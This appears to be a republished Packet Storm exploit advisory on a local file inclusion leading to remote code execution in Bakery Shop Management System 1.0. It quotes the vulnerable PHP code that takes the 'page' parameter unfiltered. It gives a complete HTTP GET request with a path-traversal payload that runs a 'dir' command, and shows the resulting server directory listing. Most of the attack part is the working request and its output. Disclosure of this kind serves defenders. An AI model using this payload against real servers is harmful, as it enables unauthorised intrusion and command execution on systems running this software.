Bakery Shop Management System 1.0 Local File Inclusion

🗓️ 06 Apr 2022 00:00:00Reported by Hejap ZairyType

packetstorm🔗 packetstormsecurity.com👁 221 Views

Bakery Shop Management System 1.0 LFI to RCE vulnerability in PHP application

`# Title: Bakery Shop Management System 1.0 LFI To RCE  
# Author: Hejap Zairy  
# Date: 06.04.2022  
# Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/  
# Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
  
  
#vulnerability Code php  
Needs more filtering require_once  
  
```  
require_once('DBConnection.php');  
$page = isset($_GET['page']) ? $_GET['page'] : 'home';  
if($_SESSION['type'] != 1 && in_array($page,array('maintenance','products','stocks'))){  
header("Location:./");  
exit;  
}  
```  
  
[+] Payload GET  
  
  
```  
GET //bsms/?page=../../../0day&515=dir HTTP/1.1  
Host: 0day.gov  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s  
Upgrade-Insecure-Requests: 1  
```  
  
  
#Status: CRITICAL  
  
#Response   
```  
<div class="container py-3" id="page-container">  
  
Volume in drive C is OS  
Volume Serial Number is 2EF1-9DCA  
  
Directory of C:\xampp\htdocs\bsms  
  
04/06/2022 04:18 AM <DIR> .  
04/06/2022 05:05 AM <DIR> ..  
02/14/2022 10:39 AM 16,358 Actions.php  
08/04/2021 11:04 PM <DIR> css  
02/14/2022 11:55 AM <DIR> database  
09/09/2021 11:54 AM <DIR> DataTables  
02/14/2022 11:55 AM 865 DBConnection.php  
08/05/2021 03:09 AM <DIR> Font-Awesome-master  
02/14/2022 12:00 PM 10,407 home.php  
02/14/2022 11:07 AM <DIR> images  
02/14/2022 02:26 PM 10,018 index.php  
09/11/2021 11:40 AM <DIR> js  
02/14/2022 11:11 AM 4,372 login.php  
  
```  
  
  
  
# Description:  
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce  
  
  
# Proof and Exploit:  
https://i.imgur.com/qLNHh9Q.png  
https://i.imgur.com/XDSsyNL.jpg  
`

06 Apr 2022 00:00Current

7.4High risk

Vulners AI Score7.4